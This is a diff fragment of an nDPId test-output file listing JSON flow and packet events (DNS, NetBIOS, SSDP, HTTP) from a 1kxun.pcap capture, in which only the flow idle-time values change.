00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -92,57 +92,57 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"} 00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 
00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 
(KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} 